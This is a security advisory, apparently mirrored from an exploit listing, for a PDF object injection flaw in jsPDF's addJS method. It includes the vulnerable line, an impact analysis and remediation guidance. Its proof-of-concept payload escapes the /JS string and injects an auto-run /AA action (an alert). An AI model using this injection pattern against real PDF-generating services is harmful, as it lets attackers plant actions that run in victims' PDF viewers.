Share
## https://sploitus.com/exploit?id=PACKETSTORM:216012
# CVE-2026-25755: PDF Object Injection in jsPDF (addJS Method)
    
    ## Description
    A PDF Object Injection vulnerability was identified in the `addJS` method of `jsPDF`. The library fails to sanitize user-supplied input for the closing parenthesis character `)`, which acts as a delimiter for literal strings in the PDF specification. This allows an attacker to escape the JavaScript object context and inject arbitrary PDF dictionaries and actions.
    
    ## Root Cause Analysis
    In `javascript.js`, the input `text` is concatenated directly into the PDF stream without escaping:
    
    ```javascript
    // Vulnerable line in javascript.js
    this.internal.out("/JS (" + text + ")"); 
    ```
    By providing a payload like ) `>> /Action ...`, an attacker can prematurely close the /JS string and the surrounding dictionary, effectively gaining the ability to write raw PDF objects into the document structure.
    
    ### Impact Analysis
    Unlike standard Cross-Site Scripting (XSS) or JS injection, PDF Object Injection bypasses the security sandboxes of the PDF JavaScript engine (AcroJS).
    
    ## Critical Risks:
    `JS-Disabled Execution`: Malicious actions (e.g., /OpenAction) execute even if the user has disabled JavaScript in their PDF viewer.
    `Document Structure Manipulation`: Ability to inject /Encrypt, /Signatures, or /Annots to alter document metadata or perform UI redressing/phishing attacks.
    
    `Universal Payload Execution`: The injected objects are processed by lightweight viewers (mobile/embedded) that may lack JS support but strictly follow the PDF object hierarchy.
    
    ## Proof of Concept 
    The following payload escapes the JS context and injects an "Additional Action" that triggers an alert:
    ```JavaScript
    import { jsPDF } from "jspdf";
    const doc = new jsPDF();
    
    // 1. ) closes the JS string.
    // 2. >> closes the current dictionary.
    // 3. /AA injects an Additional Action object.
    const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";
    
    doc.addJS(maliciousPayload);
    doc.save("vulnerable.pdf");
    ```
    ## Remediation
    Upgrade `jsPDF` to version >= 4.1.0.
    
    All user-supplied input in addJS and similar methods must escape parentheses ( ) and backslashes \ according to the PDF specification.
    Researcher: ZeroXJacks
    Severity: High (8.8)
    """